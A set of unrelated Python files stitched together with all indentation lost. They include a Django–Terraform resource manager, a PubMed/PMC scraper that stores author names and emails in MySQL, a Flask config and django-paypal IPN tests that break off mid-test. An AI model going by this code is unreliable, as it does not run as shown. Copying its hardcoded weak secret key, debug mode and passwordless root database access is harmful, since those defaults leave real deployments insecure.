files = glob.glob('{}/*.tf'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/'.format(template), '')
resource.append({
'name': name,
'items': file_handler.read(),
'format': 'hcl'
})
files = glob.glob('{}/*.tf.json'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/'.format(template), '')
resource.append({
'name': name,
'items': json.loads(file_handler.read()),
'format': 'json'
})
files = glob.glob('{}/*.tfvars'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/'.format(template), '')
variable.append({
'name': name,
'items': file_handler.read(),
'format': 'hcl'
})
files = glob.glob('{}/*.tfvars.json'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/'.format(template), '')
variable.append({
'name': name,
'items': json.loads(file_handler.read()),
'format': 'json'
})
client = python_terraform.Terraform(
working_dir=template)
return_code, raw_data, stderr = client.init(
reconfigure=python_terraform.IsFlagged,
backend=False)
if stderr == '':
status = True
init = raw_data
else:
status = False
init = stderr
data = {
'init': raw_data,
'status': status,
'resources': resource,
'variables': variable
}
response[template.replace('{}/'.format(path), '')] = data
elif kind == 'tf_state':
path = self.metadata['template_path']
if uid is None:
templates = glob.glob('{}/*'.format(path))
else:
templates = ['{}/{}'.format(path, uid)]
for template in templates:
state = {}
if os.path.isfile('{}/terraform.tfstate'.format(template)):
with open('{}/terraform.tfstate'.format(template)) as file_handler:
state['default'] = file_handler.read()
files = glob.glob('{}/terraform.tfstate.d/*/terraform.tfstate'.format(template))
for filename in files:
with open(filename) as file_handler:
name = filename.replace('{}/terraform.tfstate.d/'.format(template), '').replace('/terraform.tfstate', '')
state[name] = file_handler.read()
for name, content in state.items():
data = {
'state': json.loads(content),
'template': template.replace('{}/'.format(path), '')
}
response[name] = data
elif kind == 'tf_resource':
return_code, raw_data, stderr = self.client.graph(
no_color=python_terraform.IsFlagged)
graph = graph_from_dot_data(raw_data)[0]
#response = graph.obj_dict['subgraphs']['"root"'][0]['nodes']
return response
def process_resource_metadata(self, kind, metadata):
if kind == 'tf_template':
for resource_name, resource in metadata.items():
self._create_resource(resource_name,
resource_name,
'tf_template',
metadata=resource)
elif kind == 'tf_state':
resources = self.get_resources('tf_state')
for resource_name, resource in metadata.items():
if resource_name in resources:
current_states = resources[resource_name]['metadata']['states']
if current_states[-1]['serial'] != resource['state']['serial']:
states = current_states.append(resource['state'])
else:
states = current_states
self._create_resource(resource_name,
resource_name,
'tf_state',
metadata={
'states': states,
'template': resource['template']
})
else:
self._create_resource(resource_name,
resource_name,
'tf_state',
metadata={
'states': [resource['state']],
'template': resource['template']
})
elif kind == 'tf_resource':
nodes = {}
for node in metadata:
clean_node = 'tf_{}'.format(self._clean_name(node).split('.')[0])
if clean_node in self._schema['resource']:
nodes[self._clean_name(node)] = {
'id': self._clean_name(node),
'name': self._clean_name(node).split('.')[1],
'kind': 'tf_{}'.format(self._clean_name(node).split('.')[0]),
'metadata': {}
}
res = None
return_code, raw_data, stderr = self.client.show(
no_color=python_terraform.IsFlagged)
raw_data = raw_data.split('Outputs:')[0]
data_buffer = io.StringIO(raw_data)
for line in data_buffer.readlines():
if line.strip() == '':
pass
elif line.startswith(' '):
meta_key, meta_value = line.split(' = ')
res['metadata'][meta_key.strip()] = meta_value.strip()
else:
if res is not None:
nodes[res['id']]['metadata'] = res['metadata']
resource_id = line.replace(' (tainted', '') \
.replace(':', '').replace('(', '').replace(')', '').strip()
try:
resource_kind, resource_name = str(resource_id).split('.')
res = {
'id': resource_id,
'name': resource_name.strip(),
'kind': 'tf_{}'.format(resource_kind),
'metadata': {}
}
except Exception as exception:
logger.error(exception)
for node_name, node in nodes.items():
self._create_resource(node['id'], node['name'],
node['kind'], None,
metadata=node['metadata'])
def process_relation_metadata(self):
for resource_id, resource in self.resources.get('tf_state',
{}).items():
self._create_relation(
'uses_tf_template',
resource_id,
resource['metadata']['template'])
"""
return_code, raw_data, stderr = self.client.graph(
no_color=python_terraform.IsFlagged)
graph = graph_from_dot_data(raw_data)[0]
for edge in graph.obj_dict['subgraphs']['"root"'][0]['edges']:
source = self._clean_name(edge[0]).split('.')
target = self._clean_name(edge[1]).split('.')
if 'tf_{}'.format(source[0]) in self.resources and 'tf_{}'.format(target[0]) in self.resources:
self._create_relation(
relation_mapping['tf_{}-tf_{}'.format(source[0], target[0])],
'{}.{}'.format(source[0], source[1]),
'{}.{}'.format(target[0], target[1]))
"""
def get_resource_action_fields(self, resource, action):
fields = {}
if resource.kind == 'tf_template':
if action == 'create':
initial_name = '{}-{}'.format(resource.name.replace('_', '-'),
self.generate_name())
initial_variables = yaml.safe_dump(resource.metadata['variables'][0]['items'],
default_flow_style=False)
fields['name'] = forms.CharField(label='Template name',
initial=initial_name)
fields['variables'] = forms.CharField(label='Variables',
widget=forms.Textarea,
initial=initial_variables,
help_text="Use YAML/JSON syntax.")
return fields
def process_resource_action(self, resource, action, data):
if resource.kind == 'tf_template':
if action == 'create':
metadata = {
'name': data['name'],
'template_dir': '{}/{}'.format(self.metadata['template_path'],
resource.name),
'states': [{
'variables': yaml.safe_load(data['variables']),
'state': None,
'min_serial': 1,
'timestamp': datetime.datetime.now()
}],
}
self._create_resource(data['name'],
data['name'],
'tf_state',
metadata=metadata)
self._create_relation(
'uses_tf_template',
data['name'],
resource.uid)
self.save()
self.create_resource('tf_state', metadata)
def generate_name(self, separator='-', word_count=2):
return petname.Generate(int(word_count), separator)
def create_resource(self, kind, metadata):
logger.info("Creating {} resource".format(kind))
if kind == 'tf_state':
state_dir = "terraform.tfstate.d/{}".format(metadata['name'])
os.makedirs(os.path.join(metadata['template_dir'], state_dir))
with open(os.path.join(metadata['template_dir'], '.terraform', 'environment'), 'w') as file_handler:
file_handler.write(metadata['name'])
self.client = python_terraform.Terraform(
working_dir=metadata['template_dir'],
state="{}/terraform.tfstate".format(state_dir))
return_code, raw_data, stderr = self.client.apply(
no_color=python_terraform.IsFlagged,
auto_approve=True,
var=metadata['states'][0]['variables'])
if os.path.isfile('{}/terraform.tfstate'.format(os.path.join(metadata['template_dir'], state_dir))):
with open('{}/terraform.tfstate'.format(os.path.join(metadata['template_dir'], state_dir))) as file_handler:
metadata['states'][0]['state'] = json.loads(file_handler.read())
metadata['states'][0]['serial'] = metadata['states'][0]['state']['serial']
metadata['states'][0].pop('min_serial')
return_code, raw_data, stderr = self.client.cmd('output',
json=python_terraform.IsFlagged)
if return_code == 0:
metadata['states'][0]['output'] = json.loads(raw_data)
self._create_resource(metadata['name'],
metadata['name'],
'tf_state',
metadata=metadata)
self.save()
|
from django.contrib import admin
from .models import *
admin.site.register(User)
admin.site.register(Plan)
admin.site.register(Previous_Plans)
|
# coding: utf-8
# In[96]:
# 获得 id
# http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&term=%s' % term_name
# http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&term=cancer&retstart=3182080&retmax=100
# http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pmc&id=212403,4584127
from common import *
from lxml.etree import *
import lxml.etree
import math
import re
import pymysql
def esearch(term, retstart, retmax, db='pubmed'):
'''
根据 term 查找数据库, 返回 xml
:param term: 搜索的条目
:param retstart: 起始位置
:param retmax: 长度
:param db: 数据库, 默认为pubmed
:return: xml
'''
term = urllib.parse.quote(term.encode('utf-8', 'replace'))
# urllib.parse.quote(url.encode('utf-8', 'replace'))
str_url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=%s&term=%s&retstart=%d&retmax=%d' % (db, term, retstart, retmax)
request = urllib.request.Request(str_url)
xml = urllib.request.urlopen(request).read()
# xml = open_url(str_url, encode='utf-8')
root = lxml.etree.XML(xml)
return root
def get_id(term, retstart, retmax, db='pubmed'):
'''
返回处理后得到的id
:param term: 搜索term
:param retstart:
:param retmax:
:param db:
:return: 返回id列表
'''
root = esearch(term, retstart, retmax, db)
id_list = root.xpath('IdList/Id')
ids = [id.text for id in id_list]
return ids
def get_id_count(term, db='pubmed'):
'''
得到该 term 下的文章数目
:param term:
:param db:
:return:
'''
root = esearch(term, 1, 1, db)
# print(root.tostring())
count = root.xpath('Count')[0].text
return count
def query_id(term, retmax=100, db='pubmed'):
'''
核心函数
:param term:
:param retmax: 每页显示的id数目
:param db:
:return:
'''
count = int(get_id_count(term, db=db))
if count > int(retmax):
id_list = []
for ii in range(math.ceil(count / retmax)):
try:
ids = get_id(term, ii * retmax, retmax, db=db)
print('/'.join([str(ii), str(math.ceil(count / retmax))]) )
for id in ids:
cu_mysql.execute('insert into pmc_id values(%s)', id)
con_mysql.commit()
except Exception as e:
print(e)
cu_mysql.execute('insert into error_pmc_id values(%s)', ii)
con_mysql.commit()
# id_list += ids
# return id_list
else:
id_list = get_id(term, 0, count, db=db)
for id in id_list:
cu.execute('insert into pmc_id values(%s)', id)
# try:
# html = open_url(url, headers=headers)
# process_html(html)
# con.commit()
# except Exception as e:
# con.rollback()
# cu.execute('INSERT INTO error_dxy VALUES(?, ?)', (iterm, page))
# con.commit()
def efetch(ids, db='pubmed'):
'''
根据id列表获取摘要信息
:param ids:
:param db:
:return:
'''
str_url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=%s&id=%s' % (db, ids)
request = urllib.request.Request(str_url)
xml = urllib.request.urlopen(request).read()
root = lxml.etree.XML(xml)
return root
def process_pmc(term):
'''
处理pmc数据库文章
:param term:
:return:
'''
root = efetch(term, db='pmc')
articles = root.xpath('//article')
# 对每一篇文章进行处理
for article in articles:
journal = article.xpath('.//journal-title')[0].text
# journal-id journal-id-type="nlm-journal-id"
if article.xpath('.//journal-id[@journal-id-type="nlm-journal-id"]'):
journal_nlm_id = article.xpath('.//journal-id[@journal-id-type="nlm-journal-id"]')[0].text
issn = article.xpath('.//issn')[0].text
print(issn)
title = article.xpath('.//article-title')[0].text
subject = article.xpath('.//subject')[0].text
pmid = article.xpath('.//article-id[@pub-id-type="pmid"]')[0].text
pmc_id = article.xpath('.//article-id[@pub-id-type="pmc"]')[0].text
doi = article.xpath('.//article-id[@pub-id-type="doi"]')[0].text
authors = article.xpath('.//contrib[@contrib-type="author"]')
year = article.xpath('.//pub-date//year')[0].text
# 文章信息
aff_list = article.xpath('.//aff[@id]')
aff_dict = {}
keywords = article.xpath('.//kwd-group//kwd')
keyword_list = [kw.text for kw in keywords]
keyword_join = ','.join(keyword_list)
# ariticl_info = [pmc_id, pmid, doi, journal,journal_nlm_id, issn, title, subject, year, keyword_join]
# print(ariticl_info)
cu_mysql.execute('insert into pmc_ariticle(pmc_id, pmid, doi, journal,journal_nlm_id, issn, title, subject, year, keyword_join) values(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
(pmc_id, pmid, doi, journal,journal_nlm_id, issn, title, subject, year, keyword_join))
con_mysql.commit()
for aff in aff_list:
aff_str = tostring(aff)
aff_str_tmp = re.compile(r'(?<=>)[\s\S]*(?=</aff>)').findall(aff_str.decode('utf-8'))
if aff_str_tmp:
aff_str = aff_str_tmp[0]
aff_id = aff.get('id')
aff_dict[aff_id] = aff_str
author_index = 0
for author in authors:
author_index += 1
surname = author.xpath('.//name//surname')[0].text
given_names = author.xpath('.//name//given-names')[0].text
# full_name = surname + given_names
email_tmp = author.xpath('.//email')
if email_tmp:
email = email_tmp[0].text
else:
email='NA'
# 是否通讯作者
# <xref ref-type="corresp" rid="CR1">*</xref>
# corres = author.xpath('.//x')
corresp = 0
xref_corresp = author.xpath(".//xref[@ref-type='corresp']") # [@lang='eng']
if xref_corresp:
corresp = 1
# 通讯作者邮箱
# 获取单位
xref = author.xpath(".//xref[@ref-type='aff']")
for ii in range(len(xref)):
if(xref[ii].get('ref-type') == 'aff' ):
aff_name = aff_dict[xref[ii].get('rid')]
# print(aff_name)
cu_mysql.execute('insert into pmc_authors(pmc_id, author_index, surname, given_names, email, corresp, aff_name) values(%s, %s, %s, %s, %s, %s, %s)',
(pmc_id, author_index, surname, given_names, email, corresp, aff_name))
con_mysql.commit()
# print(pmc_id, author_index, surname, given_names, email, corresp, aff_name)
# 通讯作者, 邮箱, PMC有两类,一类 是
#<contrib contrib-type="author">
# <name>
# <surname>Jiang</surname>
# <given-names>Liwen</given-names>
# </name>
# <xref ref-type="aff" rid="A1">a</xref>
# <xref ref-type="aff" rid="A3">c</xref>
# <xref ref-type="corresp" rid="CR1">*</xref>
# </contrib>
# 另一类
# <contrib id="A3" corresp="yes" contrib-type="author">
# 以下为第二类
corresp_authors = article.xpath('.//contrib[@corresp="yes"]')
for corresp_author in corresp_authors:
surname = corresp_author.xpath('.//surname')[0].text
given_names = corresp_author.xpath('.//given-names')[0].text
# corresp_name = surname + given_names
email_tmp = corresp_author.xpath('.//email')
if email_tmp:
email = email_tmp[0].text
else:
email='NA'
# pmc_id, surname, given_names, email
cu_mysql.execute('insert into pmc_author(pmc_id, surname, given_names, email) values(%s, %s, %s, %s)',
(pmc_id, surname, given_names, email))
con_mysql.commit()
def process_pubmed(term):
root = efetch(term, db='pubmed')
# In[97]:
con_mysql = pymysql.connect(host='localhost', user='root', passwd='', db='xiaobaifinder', charset='utf8')
cu_mysql = con_mysql.cursor()
process_pmc('4686145')
cu_mysql.close()
con_mysql.close()
# In[95]:
cu_mysql.close()
con_mysql.close()
# In[ ]:
# pmc term
def get_pubmed_id():
con_mysql = pymysql.connect(host='localhost', user='root', passwd='', db='xiaobaifinder', charset='utf8')
cu_mysql = con_mysql.cursor()
cu_mysql.execute('create table if not exists pmc_id(pmc_id varchar(12))')
cu_mysql.execute('create table if not exists error_pmc_id(page int)')
con_mysql.commit()
# con = sqlite3.connect('pubmed.db')
# cu = con.cursor()
# # cu.execute('DROP TABLE IF EXISTS dxy')
# cu.execute('CREATE TABLE IF NOT EXISTS pmid (pmid varchar(12))')
# cu.execute('CREATE TABLE IF NOT EXISTS error_pmid(page int)')
# con.commit()
# 获取pmc id
term = '(PRC[Affiliation] OR China[Affiliation]) AND ("2005/1/1"[PDat] : "2015/12/31"[PDat]) '
query_id(term, db = 'pmc')
# 获取 pmc 信息
cu_mysql.close()
con_mysql.close()
# In[ ]:
def get_pubmed_id():
con_mysql = pymysql.connect(host='localhost', user='root', passwd='', db='xiaobaifinder', charset='utf8')
cu_mysql = con_mysql.cursor()
cu_mysql.execute('create table if not exists pubmed_id(pmc_id varchar(12))')
cu_mysql.execute('create table if not exists error_pubmed_id(page int)')
con_mysql.commit()
# con = sqlite3.connect('pubmed.db')
# cu = con.cursor()
# # cu.execute('DROP TABLE IF EXISTS dxy')
# cu.execute('CREATE TABLE IF NOT EXISTS pmid (pmid varchar(12))')
# cu.execute('CREATE TABLE IF NOT EXISTS error_pmid(page int)')
# con.commit()
# 获取pmc id
term = '(PRC[Affiliation] OR China[Affiliation]) AND ("2005/1/1"[PDat] : "2015/12/31"[PDat]) '
query_id(term)
cu_mysql.close()
con_mysql.close()
# In[90]:
# In[ ]:
|
#-*- coding=utf-8 -*-
import os
from datetime import timedelta
basedir = os.path.abspath(os.path.dirname(__file__))
import pymysql
SECRET_KEY = 'SSDFDSFDFD'
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://user:password@localhost/db' # user,password,db换成你的
SQLALCHEMY_TRACK_MODIFICATIONS = True
debug = True
MAIL_SERVER = 'smtp.qq.com'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = ''
MAIL_PASSWORD = ''
#payjs信息
PAYJS_ID=''
PAYJS_KEY=''
|
from __future__ import unicode_literals
import locale
import unittest
from datetime import datetime
from decimal import Decimal
from django.conf import settings
from django.test import TestCase
from django.test.utils import override_settings
from django.utils import timezone
from six import text_type
from six.moves.urllib.parse import urlencode
from paypal.standard.ipn.models import PayPalIPN
from paypal.standard.ipn.signals import invalid_ipn_received, valid_ipn_received
from paypal.standard.ipn.views import CONTENT_TYPE_ERROR
from paypal.standard.models import ST_PP_CANCELLED
# Parameters are all bytestrings, so we can construct a bytestring
# request the same way that Paypal does.
TEST_RECEIVER_EMAIL = b"seller@paypalsandbox.com"
CHARSET = "windows-1252"
IPN_POST_PARAMS = {
"protection_eligibility": b"Ineligible",
"last_name": b"User",
"txn_id": b"51403485VH153354B",
"receiver_email": TEST_RECEIVER_EMAIL,
"payment_status": b"Completed",
"payment_gross": b"10.00",
"tax": b"0.00",
"residence_country": b"US",
"invoice": b"0004",
"payer_status": b"verified",
"txn_type": b"express_checkout",
"handling_amount": b"0.00",
"payment_date": b"23:04:06 Feb 02, 2009 PST",
"first_name": b"J\xF6rg",
"item_name": b"",
"charset": CHARSET.encode('ascii'),
"custom": b"website_id=13&user_id=21",
"notify_version": b"2.6",
"transaction_subject": b"",
"test_ipn": b"1",
"item_number": b"",
"receiver_id": b"258DLEHY2BDK6",
"payer_id": b"BN5JZ2V7MLEV4",
"verify_sign": b"An5ns1Kso7MWUdW4ErQKJJJ4qi4-AqdZy6dD.sGO3sDhTf1wAbuO2IZ7",
"payment_fee": b"0.59",
"mc_fee": b"0.59",
"mc_currency": b"USD",
"shipping": b"0.00",
"payer_email": b"bishan_1233269544_per@gmail.com",
"payment_type": b"instant",
"mc_gross": b"10.00",
"quantity": b"1",
}
class ResetIPNSignalsMixin(object):
def setUp(self):
super(ResetIPNSignalsMixin, self).setUp()
self.valid_ipn_received_receivers = valid_ipn_received.receivers
self.invalid_ipn_received_receivers = invalid_ipn_received.receivers
valid_ipn_received.receivers = []
invalid_ipn_received.receivers = []
def tearDown(self):
valid_ipn_received.receivers = self.valid_ipn_received_receivers
invalid_ipn_received.receivers = self.invalid_ipn_received_receivers
super(ResetIPNSignalsMixin, self).tearDown()
class IPNUtilsMixin(ResetIPNSignalsMixin):
def paypal_post(self, params):
"""
Does an HTTP POST the way that PayPal does, using the params given.
"""
# We build params into a bytestring ourselves, to avoid some encoding
# processing that is done by the test client.
cond_encode = lambda v: v.encode(CHARSET) if isinstance(v, text_type) else v
byte_params = {cond_encode(k): cond_encode(v) for k, v in params.items()}
post_data = urlencode(byte_params)
return self.client.post("/ipn/", post_data, content_type='application/x-www-form-urlencoded')
def assertGotSignal(self, signal, flagged, params=IPN_POST_PARAMS):
# Check the signal was sent. These get lost if they don't reference self.
self.got_signal = False
self.signal_obj = None
def handle_signal(sender, **kwargs):
self.got_signal = True
self.signal_obj = sender
signal.connect(handle_signal)
response = self.paypal_post(params)
self.assertEqual(response.status_code, 200)
ipns = PayPalIPN.objects.all()
self.assertEqual(len(ipns), 1)
ipn_obj = ipns[0]
self.assertEqual(ipn_obj.flag, flagged)
self.assertTrue(self.got_signal)
self.assertEqual(self.signal_obj, ipn_obj)
return ipn_obj
def assertFlagged(self, updates, flag_info):
params = IPN_POST_PARAMS.copy()
params.update(updates)
response = self.paypal_post(params)
self.assertEqual(response.status_code, 200)
ipn_obj = PayPalIPN.objects.all()[0]
self.assertEqual(ipn_obj.flag, True)
self.assertEqual(ipn_obj.flag_info, flag_info)
return ipn_obj
class MockedPostbackMixin(object):
def setUp(self):
super(MockedPostbackMixin, self).setUp()
# Monkey patch over PayPalIPN to make it get a VERFIED response.
self.old_postback = PayPalIPN._postback
PayPalIPN._postback = lambda self: b"VERIFIED"
def tearDown(self):
PayPalIPN._postback = self.old_postback
super(MockedPostbackMixin, self).tearDown()
@override_settings(ROOT_URLCONF='paypal.standard.ipn.tests.test_urls')
class IPNTest(MockedPostbackMixin, IPNUtilsMixin, TestCase):
def test_valid_ipn_received(self):
ipn_obj = self.assertGotSignal(valid_ipn_received, False)
# Check some encoding issues:
self.assertEqual(ipn_obj.first_name, u"J\u00f6rg")
# Check date parsing
self.assertEqual(ipn_obj.payment_date,
datetime(2009, 2, 3, 7, 4, 6,
tzinfo=timezone.utc if settings.USE_TZ else None))
def test_invalid_ipn_received(self):
PayPalIPN._postback = lambda self: b"INVALID"
self.assertGotSignal(invalid_ipn_received, True)
def test_reverify_ipn(self):
PayPalIPN._postback = lambda self: b"Internal Server Error"
self.paypal_post(IPN_POST_PARAMS)
ipn_obj = PayPalIPN.objects.all()[0]
self.assertEqual(ipn_obj.flag, True)
PayPalIPN._postback = lambda self: b"VERIFIED"
ipn_obj.verify()
self.assertEqual(ipn_obj.flag, False)
self.assertEqual(ipn_obj.flag_info, "")
self.assertEqual(ipn_obj.flag_code, "")
def test_invalid_payment_status(self):
update = {"payment_status": "Failure"}
flag_info = u"Invalid payment_status. (Failure)"
self.assertFlagged(update, flag_info)
def test_vaid_payment_status_cancelled(self):
update = {"payment_status": ST_PP_CANCELLED}
params = IPN_POST_PARAMS.copy()
params.update(update)
response = self.paypal_post(params)
self.assertEqual(response.status_code, 200)
ipn_obj = PayPalIPN.objects.all()[0]
self.assertEqual(ipn_obj.flag, False)
def test_duplicate_txn_id(self):
self.paypal_post(IPN_POST_PARAMS)
self.paypal_post(IPN_POST_PARAMS)
self.assertEqual(len(PayPalIPN.objects.all()), 2)
ipn_obj = PayPalIPN.objects.order_by('-created_at', '-pk')[0]
self.assertEqual(ipn_obj.flag, True)
self.assertEqual(ipn_obj.flag_info, "Duplicate txn_id. (51403485VH153354B)")
def test_duplicate_txn_id_with_first_flagged(self):
PayPalIPN._postback = lambda self: b"Internal Server Error"
self.paypal_post(IPN_POST_PARAMS)
PayPalIPN._postback = lambda self: b"VERIFIED"
self.paypal_post(IPN_POST_PARAMS)
self.assertEqual(len(PayPalIPN.objects.all()), 2)
ipn_objs = PayPalIPN.objects.order_by('created_at', 'pk')
self.assertEqual(ipn_objs[0].flag, True)
self.assertEqual(ipn_objs[1].flag, False)
def test_posted_params_attribute(self):
params = {'btn_id1': b"3453595",
'business': b"email-facilitator@gmail.com",
'charset': b"windows-1252",
'custom': b"blahblah",
"first_name": b"J\xF6rg",
'ipn_track_id': b"a48170aadb705",
'item_name1': b"Romanescoins",
'item_number1': b"",
'last_name': b"LASTNAME",
'mc_currency': b"EUR",
'mc_fee': b"0.35",
'mc_gross': b"3.00",
'mc_gross_1': b"3.00",
'mc_handling': b"0.00",
'mc_handling1': b"0.00",
'mc_shipping': b"0.00",
'mc_shipping1': b"0.00",
'notify_version': b"3.8",
'num_cart_items': b"1",
'payer_email': b"email@gmail.com",
'payer_id': b"6EQ6SKDFMPU36",
'payer_status': b"verified",
'payment_date': b"03:06:57 Jun 27, 2014 PDT",
'payment_fee': b"",
'payment_gross': b"",
'payment_status': b"Completed",
'payment_type': b"instant",
'protection_eligibility': b"Ineligible",
'quantity1': b"3",
'receiver_email': b"email-facilitator@gmail.com",
'receiver_id': b"UCWM6R2TARF36",
'residence_country': b"FR",
'tax': b"0.00",
'tax1': b"0.00",
'test_ipn': b"1",
'transaction_subject': b"blahblah",
'txn_id': b"KW31266C37C2593K4",
'txn_type': b"cart",
'verify_sign': b"A_SECRET_CODE"}
self.paypal_post(params)
ipn = PayPalIPN.objects.get()
self.assertEqual(ipn.posted_data_dict['quantity1'], '3')
self.assertEqual(ipn.posted_data_dict['first_name'], u"J\u00f6rg")
def test_paypal_date_format(self):
update = {
"next_payment_date": b"23:04:06 Feb 02, 2009 PST",
"subscr_date": b"23:04:06 Jan 02, 2009 PST",
"subscr_effective": b"23:04:06 Jan 02, 2009 PST",
"auction_closing_date": b"23:04:06 Jan 02, 2009 PST",
"retry_at": b"23:04:06 Jan 02, 2009 PST",
# test parsing times in PST/PDT change period
"case_creation_date": b"01:13:05 Nov 01, 2015 PST",
"time_created": b"01:13:05 Nov 01, 2015 PDT",
}
params = IPN_POST_PARAMS.copy()
params.update(update)
self.paypal_post(params)
self.assertFalse(PayPalIPN.objects.get().flag)
def test_paypal_date_invalid_format(self):
params = IPN_POST_PARAMS.copy()
params.update({"time_created": b"2015-10-25 01:21:32"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertIn(
PayPalIPN.objects.latest('id').flag_info,
['Invalid form. (time_created: Invalid date format '
'2015-10-25 01:21:32: need more than 2 values to unpack)',
'Invalid form. (time_created: Invalid date format '
'2015-10-25 01:21:32: not enough values to unpack '
'(expected 5, got 2))'
]
)
# day not int convertible
params = IPN_POST_PARAMS.copy()
params.update({"payment_date": b"01:21:32 Jan 25th 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertEqual(
PayPalIPN.objects.latest('id').flag_info,
"Invalid form. (payment_date: Invalid date format "
"01:21:32 Jan 25th 2015 PDT: invalid literal for int() with "
"base 10: '25th')"
)
# month not in Mmm format
params = IPN_POST_PARAMS.copy()
params.update({"next_payment_date": b"01:21:32 01 25 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertIn(
PayPalIPN.objects.latest('id').flag_info,
["Invalid form. (next_payment_date: Invalid date format "
"01:21:32 01 25 2015 PDT: u'01' is not in list)",
"Invalid form. (next_payment_date: Invalid date format "
"01:21:32 01 25 2015 PDT: '01' is not in list)"]
)
# month not in Mmm format
params = IPN_POST_PARAMS.copy()
params.update({"retry_at": b"01:21:32 January 25 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertIn(
PayPalIPN.objects.latest('id').flag_info,
["Invalid form. (retry_at: Invalid date format "
"01:21:32 January 25 2015 PDT: u'January' is not in list)",
"Invalid form. (retry_at: Invalid date format "
"01:21:32 January 25 2015 PDT: 'January' is not in list)"]
)
# no seconds in time part
params = IPN_POST_PARAMS.copy()
params.update({"subscr_date": b"01:28 Jan 25 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertIn(
PayPalIPN.objects.latest('id').flag_info,
["Invalid form. (subscr_date: Invalid date format "
"01:28 Jan 25 2015 PDT: need more than 2 values to unpack)",
"Invalid form. (subscr_date: Invalid date format "
"01:28 Jan 25 2015 PDT: not enough values to unpack "
"(expected 3, got 2))"]
)
# string not valid datetime
params = IPN_POST_PARAMS.copy()
params.update({"case_creation_date": b"01:21:32 Jan 49 2015 PDT"})
self.paypal_post(params)
self.assertTrue(PayPalIPN.objects.latest('id').flag)
self.assertEqual(
PayPalIPN.objects.latest('id').flag_info,
"Invalid form. (case_creation_date: Invalid date format "
"01:21:32 Jan 49 2015 PDT: day is out of range for month)"
)
def test_content_type_validation(self):
with self.assertRaises(AssertionError) as assert_context:
self.client.post("/ipn/", {}, content_type='application/json')
self.assertIn(CONTENT_TYPE_ERROR, repr(assert_context.exception)),
self.assertFalse(PayPalIPN.objects.exists())
@override_settings(ROOT_URLCONF='paypal.standard.ipn.tests.test_urls')
class IPNLocaleTest(IPNUtilsMixin, MockedPostbackMixin, TestCase):
def setUp(self):
self.old_locale = locale.getlocale(locale.LC_TIME)
try:
locale.setlocale(locale.LC_TIME, ('fr_FR', 'UTF-8'))
except Exception:
raise unittest.SkipTest("fr_FR locale not available for testing")
# Put super call at the end, so that it isn't called if we skip the test
# (since tearDown is not called in that case).
super(IPNLocaleTest, self).setUp()
def tearDown(self):
locale.setlocale(locale.LC_TIME, self.old_locale)
super(IPNLocaleTest, self).tearDown()
def test_valid_ipn_received(self):
ipn_obj = self.assertGotSignal(valid_ipn_received, False)
self.assertEqual(ipn_obj.last_name, u"User")
# Check date parsing
self.assertEqual(ipn_obj.payment_date,
datetime(2009, 2, 3, 7, 4, 6,
tzinfo=timezone.utc if settings.USE_TZ else None))
@override_settings(ROOT_URLCONF='paypal.standard.ipn.tests.test_urls')
class IPNPostbackTest(IPNUtilsMixin, TestCase):
"""
Tests an actual postback to PayPal server.
"""
def test_postback(self):
# Incorrect signature means we will always get failure
self.assertFlagged({}, u'Invalid postback. (INVALID)')
@override_settings(ROOT_URLCONF='paypal.standard.ipn.tests.test_urls')
class IPNSimulatorTests(TestCase):
# Some requests, as sent by the simulator.
# The simulator itself has bugs. For example, it doesn't send the 'charset'
# parameter, unlike in production. We could wait for PayPal to fix these
# bugs... ha ha, only kidding! If developers want to use the simulator, we
# need to deal with whatever it sends.
def get_ipn(self):
return PayPalIPN.objects.all().get()
def post_to_ipn_handler(self, post_data):
return self.client.post("/ipn/", post_data, content_type='application/x-www-form-urlencoded')
def test_valid_webaccept(self):
paypal_input = b'payment_type=instant&payment_date=23%3A04%3A06%20Feb%2002%2C%202009%20PDT&' \
b'payment_status=Completed&address_status=confirmed&payer_status=verified&' \
b'first_name=John&last_name=Smith&payer_email=buyer%40paypalsandbox.com&' \
b'payer_id=TESTBUYERID01&address_name=John%20Smith&address_country=United%20States&' \
b'address_country_code=US&address_zip=95131&address_state=CA&address_city=San%20Jose&' \
b'address_street=123%20any%20street&business=seller%40paypalsandbox.com&' \
b'receiver_email=seller%40paypalsandbox.com&receiver_id=seller%40paypalsandbox.com&' \
b'residence_country=US&item_name=something&item_number=AK-1234&quantity=1&shipping=3.04&' \
b'tax=2.02&mc_currency=USD&mc_fee=0.44&mc_gross=12.34&mc_gross1=12.34&txn_type=web_accept&' \
b'txn_id=593976436¬ify_version=2.1&custom=xyz123&invoice=abc1234&test_ipn=1&' \
b'verify_sign=AFcWxV21C7fd0v3bYYYRCpSSRl31Awsh54ABFpebxm5s9x58YIW-AWIb'
response = self.post_to_ipn_handler(paypal_input)
self.assertEqual(response.status_code, 200)
ipn = self.get_ipn()
self.assertFalse(ipn.flag)
self.assertEqual(ipn.mc_gross, Decimal("12.34"))
# For tests, we get conversion to UTC because this is all SQLite supports.
self.assertEqual(ipn.payment_date, datetime(2009, 2, 3, 7, 4, 6,
tzinfo=timezone.utc if settings.USE_TZ else None))
def test_declined(self):
paypal_input = b'payment_type=instant&payment_date=23%3A04%3A06%20Feb%2002%2C%202009%20PDT&' \
b'payment_status=Declined&address_status=confirmed&payer_status=verified&' \
